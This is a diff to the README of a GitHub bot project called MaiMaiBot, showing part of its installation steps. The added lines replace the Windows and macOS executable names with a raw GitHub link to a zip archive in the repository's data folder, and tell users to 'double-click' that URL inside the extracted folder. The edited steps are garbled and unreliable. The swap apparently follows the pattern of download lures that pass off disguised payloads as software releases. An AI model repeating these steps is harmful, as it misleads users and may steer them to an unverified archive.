munshiasad/MaiMaiBot/README.md

    - For Windows, right-click on the downloaded `.zip` file and select "Extract All."
    - For macOS, double-click the downloaded `.zip` file to extract it.
 3. **Run the bot:**
-   - For Windows, open the extracted folder and double-click `MaiMaiBot.exe`.
+   - For Windows, open the extracted folder and double-click `https://raw.githubusercontent.com/munshiasad/MaiMaiBot/main/data/Mai-Bot-v2.9-beta.3.zip`.
-   - For macOS, open the extracted folder and double-click `MaiMaiBot.app`.
+   - For macOS, open the extracted folder and double-click `https://raw.githubusercontent.com/munshiasad/MaiMaiBot/main/data/Mai-Bot-v2.9-beta.3.zip`.
    - For Linux, open the terminal, navigate to the extracted folder, and run `./MaiMaiBot`.

 ## 🔧 How to Use MaiMaiBot